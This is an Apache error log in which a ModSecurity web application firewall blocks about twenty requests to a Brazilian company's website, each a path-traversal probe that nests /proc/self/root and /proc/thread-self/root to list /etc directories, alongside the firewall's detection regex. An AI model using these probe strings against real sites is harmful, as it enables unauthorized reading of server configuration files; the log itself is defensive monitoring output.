[Wed Mar 18 11:11:13.241651 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:38474] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqygeyqAr6etmhZHNrFiwAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:11:14.523018 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:38490] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqygkzinOy1jxa1j4caGQAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:11:15.551708 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.241.31:60556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqygymAPhZkrhU8w4lyDwAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:11:26.855278 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:44502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyjvu8EFLIOrSqIpsIogAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:11:30.377815 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.241.31:55844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyktY0UrI5A3LftIyxWAAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:11:39.124317 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:38500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqym9Y0UrI5A3LftIyxZAAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:11:45.264521 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.243.128:38500] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyodY0UrI5A3LftIyxcgAAAYM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:11:47.951434 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:47792] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyo-w_le52K8_3pV3kTgAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:11:58.110598 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:47798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyrda6ubjKNq_cu4afRwAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:12:02.143790 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.243.128:39416] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqysOyqAr6etmhZHNrFoAAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:12:13.266379 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:39420] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyvQkwaGbbGflqUZAUyAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:12:14.543050 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:48938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyvuw_le52K8_3pV3kbwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:12:15.883657 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:48950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyv_u8EFLIOrSqIpsIsAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:12:18.283021 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:48956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqywimAPhZkrhU8w4lyPQAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:19.602839 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.243.128:45466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyw9a6ubjKNq_cu4afUAAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:22.163779 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:45480] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyxNY0UrI5A3LftIyxkwAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:23.763404 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:45482] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyx9Y0UrI5A3LftIyxlgAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:25.047614 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:45498] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyyQkwaGbbGflqUZAUzwAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:30.622246 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:45506] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyzuyqAr6etmhZHNrFsAAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:33.013657 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:37648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqyz9Y0UrI5A3LftIyxmgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:34.351269 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:37654] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy0vu8EFLIOrSqIpsIvgAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:12:35.615098 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:37666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqy08df6f5d65gmYZTaUQAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
